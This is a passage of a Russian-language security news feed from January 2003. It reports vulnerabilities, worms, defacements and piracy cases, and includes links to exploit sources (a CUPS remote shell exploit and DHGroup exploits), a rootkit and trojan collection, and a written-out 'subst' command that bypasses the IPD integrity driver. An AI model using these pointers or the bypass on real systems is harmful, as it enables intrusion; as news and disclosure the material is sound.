коррупции (TraCCC) при Американском Университете, г.Вашингтон, США. Выражаем благодарность northfix (nortfix@xakep.ru) за предоставленную ссылку. Подробности - http://www.crime-research.org/library/Odessa_Vistup.htm
7/01/2003 22:05 Уязвимость в драйверах многих Ethernet-карт.
Разработчики из фирмы, занимающейся безопасностью, @stake, Inc. (г.Кембридж, штат Массачусетс, США) обнаружили довольно любопытную "особенность" драйверов многих сетевых Ethernet-карт. В соответствии с Ethernet-стандартом, представленным IEEE, пакет, передаваемый по Ethernet-сетям должен быть минимум 46 байт длиной. Однако, если уровень сетевой модели OSI, являющийся более высоким по отношению к IP, работает с пакетом (пакетами) размером меньше 46 байт - остальная часть Ethernet-фрейма ДОЛЖНА (согласно RFC) заполняться нулями. Специалистами @stake, Inc. Офиром Аркиным и Джошем Андерсоном было обнаружено, что это требование IEEE не соблюдается многими разработчиками драйверов Ethernet-карт и, в результате, оставшееся место во фрейме заполняется содержимым предыдущих пакетов или (в некоторых реализациях) содержимым памяти ядра. Так как сама идеология Ethernet построена на принципе широковещания, по всему физическому сегменту сети бродят пакеты, содержащие критичные данные, которые при достаточно высоком уровне квалификации можно получить. Для одного из вариантов получения подобных данных авторы рекомендуют послать ICMP-пакет уязвимой сетевой карте и потом просто анлизировать приходящие в ответ пакеты. Также подобным образом можно получить некие фрагменты траффика от роутеров и файрволлов, которые предназначались для других сегментов сети. Честно говоря, сама ситуация достаточно надумана, но с точки зрения сетевой безопасности представляет собой серьёзный прокол. О сложившейся ситуации CERT был поставлен в известность аж 25 июня прошлого года и присвоил уязвимости код VU#412115. Авторами также выпущен подробнейший отчёт в PDF-формате. Подробности - http://www.atstake.com/research/advisories/2003/a010603-1.txt Отчёт в PDF - http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
7/01/2003 18:10 Сайт www.rootkit.com.
Представляем вашему вниманию сайт www.rootkit.com. Как следует из названия, в основном на нём собрана коллекция различных руткитов. Однако кроме их имеется также большая коллекция троянов, различных патчеров, дебаггеров. Представлена также коллекция различных плагинов для IDA. Однако, это не просто коллекция, а что-то очень похожее на систему для разработчиков (наподобие проекта sourceforge), все программы представлены с исходниками. Можно смело порекомандовать сайт для людей, занимающихся разработкой, отладкой и реверсингом программ. Сайт - http://www.rootkit.com/
7/01/2003 17:29 6 важных моментов в безопасности WLAN.
При создании беспроводных сетей одной из самых важных задач является закрытие точек доступа в сеть (wireless access point-WAP) от проникновения снаружи. В отличие от обычных проводных сетей, где количество возможных мест подключения к сети довольно ограничено, в случае беспроводных сетей это количество определяется радиусом действия антенны беспроводной сети. На сайте ZDNET опубликована статья Scott Lowe из TechRepublic под названием "Top 6 wireless networking tips", в которой автор пытается изложить 6 самых основных пунктов, которые необходимо выполнить для обеспечения безопасности беспроводной сети. Если перечислить их вкратце, то это выглядит так: 1. Определение безопасного места расположения антенны, 2. Использование cтандарта шифрования WEP (Wireless encryption protocol), 3. Изменение используемого по умолчанию SSID (service set identifier) для точки доступа (WAP) и отмена бродкаста (широковещания), 4. Запрет в сети DHCP, 5. Запрет или модификация используемых по умолчанию установок SNMP, 6. Использование в сети списков доступа (access lists). Для людей, связанных с сетями WLAN, либо планирующих ими заняться, почитать статью было бы нелишне. Подробности - http://techupdate.zdnet.com/techupdate...
7/01/2003 17:05 Почему IE так быстр... иногда.
Ребята с сайта http://slashzone.ru/ нашли довольно любопытную статью. "Наконец-то мы получили объяснение, как именно жульничает Internet Explorer, чтобы создать благоприятное впечатление о своём быстродействии. Вот выдержка из статьи: "Internet Explorer может работает или невероятно быстро (страница загружается быстрее, чем курсор мыши успеет переместиться в предыдущее положение), или до смешного медленно..." Прочитав статью, вы поймёте, почему." Статья - http://grotto11.com/blog/?+1039831658
7/01/2003 16:36 Настройка VPN с использованием IPSec на FreeBSD.
Сайт opennet.ru порадовал очередным полезным документом, фактически являющимся переводом оригинала, но тем не менее представляющим ценность для администраторов, столкнувшихся с необходимостью построения виртуального канала на FreeBSD. "Configuring IPSec" - пошаговое руководство по настройке IPSec тунеля на FreeBSD (с использованем Racoon IKE демона). По самой ссылке есть и ссылка на оригинал. Подробности - http://www.opennet.ru/opennews/art.shtml?num=1935
7/01/2003 16:24 Попытка включения бинарной совместимости с MacOS в NetBSD.
Первый шаг по созданию маковской "бинарной совместимости" на NetBSD/powerpc удалось сделать Christos Zoulas'у и Emmanuel Dreyfus'у. На данный момент успешно запускается большинство приложений, таких как ls, sh, etc, WindowServer (маковский эквивалент X server'у), правда при первом обращении к IOKit он вылетает. Взято с linux.org.ru. ПОдробности - http://hcpnet.free.fr/applebsd.html
7/01/2003 15:51 Возможность перезапуска Windows при попытке просмотра шрифта.
Как пишет в списке рассылки BUGTRAQ Andrew Connell из Новой Зеландии, им создан маленький (2 килобайтный) некорректный файл OpenType-шрифта, особенностью которого является то, что при попытке его просмотра стандартным вьювером (fontview) в ОС WinXP, Win2K происходит немедленная перезагрузка этих ОС. Сам автор остальные версии ОС не тестировал. Однако моя проверка (ньюсмейкера) этого файла в ОС Win98 не привела к перезанрузке ОС - было просто выдано сообщение о некорректном файле шрифтов. Впрочем, каждый из заинтересовавшихся может проверить это, загрузив в файл со ссылки, приведённой ниже. Подробнее - http://online.securityfocus.com/archive...
7/01/2003 15:08 Microsoft выпустила пакет с украинским интерфейсом для Windows XP Pro.
Microsoft объявляет о выпуске Windows Ukrainian Interface Language Pack для русской версии Windows XP Professional. Украинский Interface Pack позволит пользователям получить локализованный на украинский язык интерфейс пользователя операционной системы Window XP Professional. Это стало возможным благодаря использованию основанной на стандарте Unicode технологии Microsoft Multilanguage User Interface (MUI), которая позволяет локализовать наиболее часто используемые компоненты операционной системы. Пользователи лицензионной версии русскоязычной Windows XP Professional имеют возможность бесплатно сгрузить пакет с украинским интерфейсом Windows Ukrainian Interface Language Pack с веб-страницы или заказать у реселлеров программного обеспечения Microsoft специальный комплект Windows XP Professional Ukrainian Disk Kit CD (номер E85-01980). Источник - http://www.cnews.ru/
6/01/2003 18:27 Поздравляем с РОЖДЕСТВОМ!
Команда UINC поздравляет всех посетителей нашего сайта с Рождеством и желает всем приятного проведения этого светлого праздника. Источник - МЫ
6/01/2003 14:16 Дефейс сайта "Программист".
В канун праздников был осуществлён дефейс сайта, посвящённого программированию - www.programme.ru. Как следует из головной странички дефейснутого сайта, дефейс произведён группой HacK Warriors Group. Видно, таким вот странным образом группа поздравила своих коллег с Новым Годом! :) На момент написания новости сайт ещё находился в дефейснутом состоянии. :) На всякий случай приводим ссылку на зеркало дефейса. Сайт - http://www.programme.ru/ Зеркало дефейса - http://insafe.ru/release/prog_deface.htm
6/01/2003 14:6 Статья "Журналируемые файловые системы"
Сайт Linux Magazine опубликовал статью под названием "Journaling File Systems". Первая журналируемая файловая система была выпущена фирмой SGI для своей ОС IRIX И называлась XFS. Особенностью журналируемых файловых систем является то, что ведётся журнал - списоу всех изменений, которые были внесены в файловую систему, что позволяет в дальнейшем довольно легко восстановить файловую систему, а также увличить производительность операций ввода-вывода. В Линукс впервые появилась возможность журналирования в файловой системе Ext3. Также к журналируемым файловым системам отностся: ReiserFS, XFS и JFS. Статья рекомендуется к чтению в плане общего ознакомления с журналируемыми файловыми системами. Подробности - http://www.linux-mag.com/2002-10/jfs_01.html
6/01/2003 13:57 Эксплоит для удалённого взлома CUPS.
Опубликован эксплоит, позволяющий удалённо взламывать сайты с установленной службой CUPS - об уязвимости в этой системе мы писали в наших новостях. Написан на С неким sigdoom из Норвегии. Позволяет получить шелл с привилегиями CUPS - обычно lp. Исходник - http://packetstorm.linuxsecurity.com/0301-exploits/sigcups.c
6/01/2003 13:46 Microsoft подает в суд на коммерческую фирму из России.
Уголовное дело по факту незаконного использования авторских прав компании Microsoft возбуждено в Новосибирске. Как сообщает РИА «Новости», дело возбуждено в отношении местной коммерческой фирмы, которая занималась продажей компьютеров с незаконно установленным в них программным обеспечением, относящимся к разработкам компании Microsoft. По словам следователей прокуратуры, программное обеспечение устанавливалось на продаваемые компьютеры при помощи пиратской копии этой программы. Руководителю коммерческой фирмы сейчас грозит уголовная ответственность по статье УК РФ 146 часть 1 «Нарушение авторских и смежных прав», которая предусматривает крупный штраф, либо лишение свободы на срок до 2 лет. Источник - http://www.rian.ru/
6/01/2003 13:20 Террористы учатся через Интернет.
Израильская армия обвинила военную исламскую организацию «Хамас» в том, что она использует интернет для подготовки очередных военных атак. Обвинение последовало в пятницу после того, как израильские специалисты обнаружили на одном из веб-сайтов исламской группировки руководство по изготовлению ядов, сообщает Reuters. Руководство по изготовлению сильнодействующих ядовитых веществ и отравляющих газов было написано на английском языке и содержало детальную инструкцию и диаграммы. Однако исламская группировка отрицает свою причастность к содержанию «Инструкции». По словам представителей группировки, инструкция по приготовлению ядов была выставлена на страничке дисскусии, где каждый может свободно высказать свое мнение. На вопрос, кто распространяет подобную информацию на их ресурсе, представители «Хамаса» ответили, что кроме ника «Красный барон» им больше ничего не известно об анонимном террористе. Источник - http://internet.ru/
6/01/2003 12:45 Сделай из компа TV приставку :).
Ньюсмейкеры сайта lrn.ru приводят ссылку на весьма интересный проект, позволяющий создавать некоторое подобие меню с дистанционным управлением с пульта. В итоге можно очень просто и быстро превратить любой компьютер с Linux в некоторую телевизионную приставку, обращаться с которой сможет вся семья. Конфигурационные файлы в этом проекте представляют из себя некоторые XML документы, определяющие синтаксис меню. Подробнее - http://www.bluelightning.org/ebox/eboxy/
6/01/2003 12:24 Взломан Сайт Гражданской Школы Хэкеров!
4 января официальный сайт Гражданской Школы Хэкеров (http://hscool.ugin.ru/), возглавляемой живой легендой ФИДО, неподражаемым клоуном российского киберандеграунда, Великим Гуру Арви Хэкером, был захвачен. На его месте открыт Музей ГШХ, который стоит посмотреть всем =))) Добро пожаловать! Источник - http://www.securitylab.ru
6/01/2003 11:47 Cтатья "Авторские права".
Сайт "Компьлента" опубликовал статью, являющуюся фактически аналитическим обзором, посвящённым проблемме авторского права. Особенно актуально эта проблема встала после недавно разгоревшегося скандала вокруг фирмы "Элкомсофт" и её программиста Дмитрия Склярова, разработавшего программу Advanced eBook Processor, позволяющую вскрывать защиту электронных книг в формате Adobe eBook. Весной американский сенатор Фриц Холлингс предложил проект закона CBDTPA. Если он будет принят, любые электронные устройства, которые не соответствуют стандартам защиты контента от копирования, установленным правительством США, окажутся под запретом. Пока все возмущались абсурдностью закона, Microsoft без особого шума работала над реализацией пресловутых "ущербных" компьютеров, не умеющих копировать информацию. О разработке стало известно только в июне, когда в еженедельнике Newsweek была опубликована подробная статья о технологии под кодовым названием Palladium. В общем, этот обзор несомненно стоит почитать, что мы вам и рекомендуем сделать. Подробности - http://www.compulenta.ru/clenta/2002/000867.html
6/01/2003 11:04 Британское местное самоуправление недовольно новой "контролирующей" стратегией развития e-government.
Новая британская правительственная стратегия по развитию электронного бизнеса, вступившая в силу на прошлой неделе, получила неоднозначную оценку местных органов управления. В документе перечислены пункты, которые необходимо учитывать местным властям в процессе разработки собственных стратегий в области предоставления услуг онлайн. Сюда входит список вопросов, которые требуется задавать организациям, а также детализация услуг по поддержке этих структур. Глава местного правительства Кристофер Лесли (Christopher Leslie) заявил, что программа развития электронного бизнеса ориентирована на модернизацию сферы услуг общественных институтов. По заявлению Лесли, по мере увеличения общественного спроса на такого рода услуги, необходимо искать более эффективные способы их продвижения на правительственном и муниципальном уровне. Сфера общественных услуг должна функционировать в более доступном и удобном режиме, а также быть более эффективной. Тем не менее, ряд представителей местного самоуправления уже выразили критическую оценку намеченной стратегии как излишне контролирующей. В частности, в документе не рассматривается подробно, каким образом будет распределено финансирование, выделенное на развитие онлайновых услуг еще в июле. Источник - http://www.cnews.ru
5/01/2003 9:27 Статья "GPL или BSD? Да!".
На сайте linuxgazette опубликован перевод Ивана Песина статьи Марка Нильсена (Mark Nielsen), названная в оригинале "GPL or BSD? Yes!". Как следует из названия, статья посвящена обзору двух видов лицензий, применяемых в мире открытых систем и открытого программмного обеспечения - лицензии GNU и лицензии BSD. Статья довольно неоднозначная, но ознакомиться с ней, несомненно, необходимо. Процитируем один из выводов: "Один важный принцип, который нужно понять: ОДНА ЛИЦЕНЗИЯ НЕ МОЖЕТ БЫТЬ ЛУЧШЕ ИЛИ ХУЖЕ ЛЮБОЙ ДРУГОЙ ЛИЦЕНЗИИ. Она лишь может больше или меньше подходить для ваших задач. Лицензия -- это основа того, как люди должны себя вести, что очень похоже на правительство". Статья - http://gazette.linux.ru.net/lg75/articles/rus-nielsen.html
5/01/2003 9:23 Хакерский конкурс Xbox финансирует глава Lindows.
Майкл Робертсон (Michael Robertson), генеральный директор компании Lindows, признался, что это он является анонимным жертвователем 200 тыс. $ в призовой фонд конкурса по переносу операционной системы Linux на видеоигровую консоль Microsoft Xbox. Саморазоблачение было сделано в форме постинга на сайте Xbox Linux Project, входящем в систему сайтов SourceForge — проектов коллективной разработки ПО с открытым исходным кодом. Робертсон представился как лицо, финансировавшее конкурс, и продлил его сроки. Подлинность постинга на SourceForge он подтвердил в интервью CNET News.com, подчеркнув, что организовал конкурс не для того, чтобы преследовать какие-то бизнес- цели, а из желания обеспечить открытый доступ к технологии. Подробнее - http://www.zdnet.ru/?ID=293988
5/01/2003 9:02 Макровирус W97M.Killboot изменяет основные загрузочные записи.
Разработчики антивирусного обеспечения из компании Symantec объявили об обнаружении нового макровируса W97M.Killboot. Сначала W97M.Killboot поражает активный документ, открытый в текстовом редакторе Word. При закрытии этого документа влиянию вируса подвергается и шаблон Normal.dot, что означает дальнейшее поражение всех закрываемых документов. Вирус делает недоступным опцию "установить защиту", а также не позволяет пользователю изменять формат файлов, открытых в отличном от Word Document или Template формате. Впрочем, главную угрозу W97M.Killboot несет не документам Word. Вирус создает файл C:\Setver.exe, который при открытии запускает вирусный код для изменения основной загрузочной записи (MBR) на всех жестких носителях компьютера. Воздействию вируса подвержены все версии ОС Windows, начиная с Windows 95. О способах распространения вируса ничего не сообщается. Подробнее - http://securityresponse.symantec.com/...
4/01/2003 16:28 Червь Tulu активизируется при виде числа 7.
Обнаружен вирус-червь Tulu. Червь представляет собой приложение Windows (PE EXE-файл), имеет размер около 63K (упакован UPX, размер распакованного файла - около 86K), и написан на Microsoft Visual C++. При первом запуске червь активизирует процедуру инсталляции и копирует себя в каталог Windows с именем "MsKernel32.exe", в системный каталог Windows с именем "Rundll32.exe" и регистрирует второй файл в ключе авто-запуска системного реестра: "HKLM\Software\Microsoft\Windows\CurrentVersion\Run Shell = %SystemDir%\Rundll32.exe". Одновременно с этим создаётся новый ключ реестра с двумя переменными: "HKLM\Software\Ktulu App = %WinDir%\MsKernel32.exe Times = 0", где "App" указывает на первую копию червя, а "Times" является счетчиком запусков червя и увеличивается при каждом старте зараженного файла. На этом Tulu прекращает свою работу и активизируется только при повторном запуске (например, из ключа "Run" при перезагрузке Windows). При достижении счетчиком "Times" значения 7 червь активизирует свои прецедуры (т.е. червь в большинстве случаев "спит" и ждёт седьмой загрузки Windows). При значении счетчика 7 и более червь копирует себя с именем "ktulu.exe" на все удалённые диски, доступные на запись, создаёт в каталоге Windows файл "normal.dot" и записывает в него макросы. При открытии и закрытии документа вирус перезаписывает свой normal.dot вместо всех "dot" файлов, найденных на локальных дисках, вписывает строку "Ktulu :)" в начало файла "Regedit.exe" в каталоге Windows, а затем ищет все файлы "Msinfo32.exe" на всех локальных дисках и записывает в них тот же текст. Файлы после этого становятся неработоспособными. После этого вирус ищет все диски, являющиеся CD-ROM и пытается копировать себя на диск с именем "autorun.exe" и записать команду авто-запуска этого файла в системный файл "autorun.inf" на том же диске. Затем червь копирует себя на сменные диски и виртуальные диски (RAMDISK) с именами, случайно выбираемыми из списка. При значении счетчика 13 и более червь вписывает строку "Ktulu :)" в начало файлов в каталоге Windows. При значении счетчика 15 и более червь в системном каталоге Windows переименовывает все файлы с расширением имени .CPL в файлы с расширением имени .PNL и устанавливает на переименованные файлы атрибуты "скрытый", "системный", "read-only". При значении счетчика 100 и более червь создаёт в корневых каталогах всех локальных дисков файл "Leame.vbs". Источник - http://www.viruslist.ru
4/01/2003 16:04 "Десятка" вирусов декабря.
Согласно данным, собранным бесплатной онлайновой программой Panda ActiveScan, в последнем месяце 2002 года "I"-вариант червя Klez снова стал самым активным вирусом. Этот особо опасный вредоносный код участвовал более чем в 12% случаев вирусных заражений, оставив далеко позади своего главного конкурента - червя Bugbear, общее количество заражений которым составило примерно 5%. Третьим по популярности вирусом, обнаруженным бесплатной онлайновой антивирусной программой от компании Panda Software в декабре 2002 года, стал Elkern.C, доля заражений которым составила 3,5%. Четвертое и пятое места вирусного "хит-парада" заняли Nimda и PSW.Bugbear. Остальные пять вирусов, замыкающие десятку самых популярных вредоносных кодов, представлены вариантами "J", "E" и "H" червей Opaserv, Porndial.B и Sysres. Подробнее - http://www.cnews.ru/news/ebusiness/...
4/01/2003 13:27 Уязвимости в IPD.
Cообщается о наличии уязвимости в IPD (Integrity Protection Driver) - драйвере ядра для ОС Windows NT и Windows 2000, который защищает целостность ядра этих ОС, предотвращая возможность подставления "левых" драйверов (например, руткитами). IPD защищает директорию WINNT/system32/drivers, делая невозможным модификацию файлов в этой директории. Осуществляется подобная защиты проверкой пути файлов при выполнении функций ядра ZwCreatFile() и ZwOpenFile(). Однако в 59-м номере журнала PHRACK была описана возможность обхода подобной защиты при помощи функции NtCreateSymbolicLinkObject(), которая создаёт символическую ссылку на c:\winnt\system32\drivers. Обращаясь в дальнейшем к созданной ссылке можно обмануть IPD. Кроме того, Jan K. Rutkowski нашёл ещё один способ обхода защиты при помощи команды subst. Применив subst x: c:\winnt\system32\drivers, и затем просто скопировав необходимый драйвер в директорию x: можно, таким образом, обмануть защиту. Авторы IPD, компания Pedestal Software выпустила новую версию IPD - 1.4. Пользователям драйера IPD рекомендуют обновиться. Новая версия - http://pedestalsoftware.com/intact/ipd/
4/01/2003 12:04 В Рунете создается база украденных мобильных телефонов.
Как сообщает сайт cnews.ru, в целях борьбы с воровством сотовых телефонов, при поддержке Общества потребителей мобильной связи запущен в тестовую эксплуатацию сайт "Проект IMEI". Этот проект призван не только создать возможность для любого абонента внести в базу данных свой украденный телефон, но и зарегистрировать телефон еще до момента утраты. Кроме этого, сайт содержит инструкции, которые помогут абоненту свести к минимуму сам риск утраты телефона и дают рекомендации, что же делать, если неприятность все же произошла. В настоящий момент участием в "Проекте IMEI" заинтересовался крупнейший российский оператор сотовой связи компания МТС. Проект IMEI - http://www.imeigsm.ru
4/01/2003 11:10 Уязвимость в ОС IRIX.
Координационный центр по безопасности фирмы SGI оповещает своих пользователей о наличии уязвимости в cервисе fam операционной системы этой фирмы IRIX. RPC-сервис fam представляет собой сервер для отслеживания изменений в файловой системе. Была обнаружена уязвимость, позволяющая удалённому атакующему получать при помощи fam информацию об именах файлов и директорий в ОС IRIX. Всем пользователям рекомендуют обновиться до версии IRIX 6.5.11, в которой этой уязвимости нет. Подробности - http://oss.sgi.com/bugzilla/show_bug.cgi?id=151
4/01/2003 10:41 Уязвимость в программе wall ОС Solaris.
Как пишет в своём письме BUGTRAQ Brant Roman, им обнаружена возможность обмана пользователей при помощи стандартной UNIX-утилиты /usr/sbin/wall в ОС Solaris (возможно и других ОС, в которых исходный код взят от AT&T). Эта утилита применяется для посылки сообщения всем пользователям локальной системы. Также подобная утилита может быть использована для посылки сообщений пользователям удалённой системы (обслуживается службой RPC rpc.walld). При приёме сообщения демон wall определяет с какой машины было послано сообщение (локальной или удалённой), на основании дескриптора файла стандартных ошибок stderr, соответствующего определённой консоли tty. Если этот дескриптор не указывает на соответствующий tty, предполагается, что сообщение послано с удалённой системы и производится анализ поля "From:". Автор заметил, что существует возможность закрытия файла stderr до запуска утилиты wall, что позволяет локальному злоумышленнику ввести в заблуждение всех пользователей системы, послав ложное сообщение от удалённого администратора. Выпущен соответствующий эксплоит под именем wallspoof.c. Уязвимость обнаружена в версиях Solaris 2.x-9. Источник - http://www.securityfocus.com
4/01/2003 10:21 Уязвимости в Bugzilla.
Команда разработчиков проекта Bugzilla (система централизованного отслеживания/сопровождения багов в ПО - bug-tracking system) в лице руководителя Дейва Миллера, сообщает о выпуске трёх новых релизов пакета - двух стабильных ветвей - 2.14.5 и 2.16.2, и одной девелоперской - 2.17.3. Выпуск новых версий связан с обнаружением потенциальных уязвимостей. Первая из них связана с возможностью локального доступа к директории (local file permissions, bug 183188), вторая, более существенная с возможностью удалённого доступа к базе данных, содержащей пароль администратора (remote database password disclosure, bug 186383). Соответственно, всем пользователям Bugzilla Настоятельно рекомендуют обновиться до вновь выпущенных версий. Кроме того, тем, кто использует ветвь 2.4.х советуют переходить на ветвь 2.6.х, поскольку первая из них больше разработчиками поддерживаться не будет. Уязвимость 1 - http://bugzilla.mozilla.org/show_bug.cgi?id=183188 Уязвимость 2 - http://bugzilla.mozilla.org/show_bug.cgi?id=186383
3/01/2003 21:08 Чего ждать от вирусов в наступившем году.
В 2002 году пользователи и компании получили передышку после разрушительных вирусных эпидемий 2001 года. Однако на очереди поколение еще более опасных червей. Прошедший год оказался относительно спокойным в отношении вирусных атак, но эксперты предупреждают, что это затишье может предвещать бурю. По их мнению, в 2003 году вероятны новые виды компьютерных атак, способных в считанные минуты вывести из строя миллионы компьютеров. «Эти методы уже обсуждаются, и алгоритмы уже известны, — говорит менеджер по антивирусным исследованиям компании F-Secure Микко Хиппонен (Mikko Hypponen). — То, что кто- нибудь попробует применить их на практике — всего лишь вопрос времени». В числе обсуждаемых концепций червь Warhol, способный вызвать гигантскую вспышку эпидемии в течение 15 минут, и флэш-червь, которому для такого же эффекта достаточно 15 секунд. «Типичное время реакции в большинстве новых инцидентов составляет 2-3 часа. Если атака происходит за 15 минут, спасенья нет», — говорит Хиппонен. Эксперты выдвигают разные теории для объяснения причин ослабления вирусных атак. В 2001 году F-Secure присвоила наивысший, первый уровень опасности девяти атакам, тогда как в 2002 было всего две атаки этой категории. Атак второго уровня в 2001 году было 43, а в 2002 только 13. «В чем особенность 2001 года? Это был наихудший в истории год. На него пришлись семь из 10 крупнейших вирусных атак, — говорит Хиппонен. — Прошедший год был немного спокойнее, но не сильно отличался от 2000-го». Он считает, что определенное влияние на поведение распространителей вирусов оказал принятый после терактов 11 сентября закон о борьбе с терроризмом, и отмечает усиление вирусных атак после 11 сентября 2002 года. Был обнаружен вирус, специально посвященный этой дате, хотя широкого распространения он не получил, а вскоре после этого на интернет обрушились разрушительные черви Slapper и Bugbear. Подробнее - http://news.zdnet.co.uk/story/0,,t269-s2127605,00.html
3/01/2003 20:43 Microsoft расширяет область применения антипиратсткой технологии.
Медиадополнение к Windows ХР станет очередным шагом вперед в развитии технологии активации продуктов. Во вторник Microsoft планирует официально представить Plus Digital Media Edition (DME), пакет дополнений к операционной системе Windows ХР стоимостью 19,95 $. С момента выпуска Windows 95 компания предлагала разные версии Plus, но эта версия Plus DME впервые защищена технологией активации продуктов, что означает, что при ее установке потребители должны будут ввести 25-значный код, а затем «активировать» Plus DME через интернет. Одновременно с этим софтверный гигант экспериментирует с новыми методами распространения ПО. «Plus Digital Media Edition станет первым продуктом Microsoft, продаваемым в цифровом виде в онлайне, — говорит директор отделения Windows Digital Media Microsoft Джонатан Юшер (Jonathan Usher). — Чтобы организовать цифровую торговлю, нам пришлось использовать технологию, позволяющую покупателям легко воспользоваться продуктом, и в то же время защищающую его от пиратов». Подробности - http://www.zdnet.ru/?ID=293983
3/01/2003 20:15 3 новых уязвимости, обнаруженные DHGroup.
Группа наших соотечественников под названием DHGroup (Damage Hacking Group) сообщила 31 декабря об обнаружении членами этой группы 3-х новых уязвимостей. Первая - уязвимость в 4-х сервисах продукта EServ/2.97 позволяют удалённо привести сервер в состояние DoS. Вторая - уязвимость в CuteFTP v.4.5 может быть использована FTP-серверами для выполнения кода на стороне клиента. Третья - уязвимость в WinAmp3 final(!) - при запуске "специального" b4s-файла, в винампе происходит переполнение буфера. Esi, ecx и retaddr перезаписываются переполнившими буфер данными, что может послужить для выполнения произвольного кода с правами пользователя, запустившего файл. Помимо этого, в раздел Текстов на сайте выложены две новые статьи: "Получение root-привелегий через OpenWebMail v.1.71", "Некоторые приемы в Win2K". Подробности и эксплоиты - http://dhgroup.by.ru/bugs/
3/01/2003 15:26 Cоветы по FreeBSD.
Продолжая тему FreeBSD, хотелось бы также дать ссылку на довольно полезный сайт, содержащий подборку советов и рекомендаций по операционной системе FreeBSD. Сайт проекта - http://freebsdhowtos.com/
3/01/2003 15:11 Запускаем ProFTPD в FreeBSD Jail.
Сайт www.opennet.ru выложил ссылки на довольно любопытную статью. В ней рассказано как помещать процессы в jail-окружение FreeBSD, повествование ведется на примере ProFTPD. Будет представлять несомненный интерес для СИСАДМИНов, обслуживающих сервера под управлением FreeBSD. Ссылка - http://www.ezunix.org/modules.php?op=modload...
3/01/2003 14:43 Выход Linux 2.5.54.
Линус Торвальдс поздравляет всех с Новым Годом и предлагает на пробу новый выпуск эксперементального ядра. Есть доработки в USB, подсистеме управления модулями, обновлен код для m68k. ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.54
3/01/2003 14:19 Пять лет обзору RSN.
31 декабря исполнилось 5(!) лет обзору RSN (Russian Security Newsline), который неизменно выпускает Дмитрий Леонов aka dl - создатель популярнейшего сайта, посвящённого сетевой безопасности www.bugtraq.ru (бывший www.hackzone.ru). Хотелось бы от имени команды UINC поздравить Дмитрия с этим выдающимся юбилеем и пожелать ему творческих успехов! Источник - http://www.bugtraq.ru
3/01/2003 14:08 В США арестовали русского хакера.
В пятницу в Лос-Анджелесе был арестован русский студент Игорь Серебряный по обвинению в нарушении прав на интеллектуальную собственность. Как передает телекомпания НТВ, американские спецслужбы доказали, что он украл у крупнейшей спутниковой телекомпании «ДиректТВ» техническую информацию стоимостью 25 миллионов долларов. Слушатель Чикагского университета Игорь Серебряный, работая в адвокатской фирме, клиентом которой был «ДиректТВ», скопировал и передал хакерам информацию о карте доступа к программам канала. До этого момента карта считалась не доступной для взлома. Следователю 19- летний «Робин Гуд» объяснил, что хотел подарить людям бесплатное телевидение. Оказалось, что Игорь Серебряный совершил кражу бескорыстно. Источник - http://www.ntv-tv.ru
2/01/2003 22:10 Возможность обмана фильрующих сетевых устройств.
Здесь попроще. Как указано, 100% устройств, фильтрующих траффик на сетевом уровне модели OSI 4 не проверяют конрольную сумму этого самого уровня. Подобная особенность может быть использована атакующим для (как сказано) активной фильтрации и определения типа ОС файрволла. Подробности на технологию ссылаются на вновь выпущенный 60-й номер журнала PHRACK. Честно говоря, технология, описанная автором статьи скорее теоретическая - применимая для реализации сетевых сканеров - потому что по описанной технологии, например, на посылку пакета с выставленным флагом TCP SYN, этот самый сервер посылает RST-ACK. Подробности - http://www.phrack.org/phrack/60/p60-0x0c.txt
2/01/2003 20:55 Возможность раскрытия информации в Netscape.
Тяжело разбираться после прошедшего Нового Года с дырками, которые непьющие буржуи находт на наши головы. Но один товарищ под именем Майкл Пучол нашёл, что удалённая почта в почтовых клиентах Нетскейп версии 7 не удаляется до конца и существует возможность найти эту самую критичную информацию. Подробности - http://www.securityfocus.com
2/01/2003 12:09 Обновлённая версия книги "Руководство по безопасному программированию в Linux и UNIX".
Как сообщает Дэвид Уиллер (David A. Wheeler), им выпущена обновлённая версия книги "Secure Programming for Linux and Unix HOWTO". Выпущенная версия 3.005 датирована 30 декабря 2002 г. Книга представляет собой полнейшеей руководство по написанию безопасных программ в средах Linux и UNIX, к которым относятся: программы просмотра удалнных данных, Web-приложения (в т.ч. CGI-скрипты), сетевые серверные программы, а также программы, тебующие для своей работы применения механизма SUID/SGID. Документ посвящён описанию программирования на языках программирования C, C++, Java, Perl, Python и Ada95. По сравнению с предыдущей версией (3.000) в новой версии расширено описание механизма безопасного создания временных файлов при помощи функции mktemp(1), замечания о возможностях избежания переполнения буфера в FD_SET/FD_CLR(), а также дискуссия о новом виде атак на Вэб-приложения - фиксация сессии (session fixation). Статья - http://www.dwheeler.com/secure-programs
2/01/2003 11:30 Антивирусные специалисты недооценили нового интернет-червя.
Разработчики антивирусного программного обеспечения из компании McAfee Security предупреждают пользователей о появлении компьютерного вируса W32/Yaha.k. W32/Yaha.k классифицируется как интернет-червь и распространяется по электронной почте. Степень его опасности оценивается как средняя, хотя сразу после обнаружения W32/Yaha.k 21 декабря специалисты считали его более безобидным, отмечает сайт журнала ZDNet. Вирус представляет собой приложение к электронному посланию размером 34,304 байт. Тема зараженного послания представлена в 46 вариантах, а название приложенного файла - в 52 вариантах. В случае запуска червь парализует работу антивирусного программного обеспечения и активирует код DDoS-атаки против неизвестного удаленного компьютера. Червь многократно копирует себя в системную папку Windows под именами NAV32_LOADER.EXE, TCPSVS32.EXE или WINSERVICES.EXE. Подробное описание - http://vil.nai.com/vil/content/v_99918.htm
2/01/2003 11:06 Хакерство в 2002 году приобрело массовый характер.
Итак, начинаем наш посленовогодний обзор новостей в мире компьютерной безопасности. Первая новость наступившего года, тем не менее, связано с прошлым годом. Уходящий год начался невиданной по масштабу антипиратской операцией западных спецслужб против хакерских групп, виновных в распространении контрафактного софта и видеофильмов, сообщают "Известия". Год продолжился появлениями новых вирусов, нарастанием вала "спама", почти удавшейся попыткой неизвестных злоумышленников нарушить связность интернета, немногочисленными арестами кибервредителей и еще менее многочисленными случаями их осуждения. Текущий год завершается на фоне прогнозов, обещающих в 2003 г. катастрофическое распространение "спама", вывод из строя основных узлов Сети на два-три дня в результате нападений хакеров и оживление рынка персональных компьютеров. Что касается вирусов, то нам всем в ближайшем будущем придется впасть в наркотическую зависимость от антивирусных компаний. Уходящий год показал: хакерство в 2002 году стало столь массовым, что мировые правительства стали принимать решительные меры. Например, в Китае под предлогом национальной и пожарной безопасности закрывали интернет-кафе, в Греции запрещали компьютерные игры как азартные, в Индии пытались ввести принудительную регистрацию по паспорту посетителей 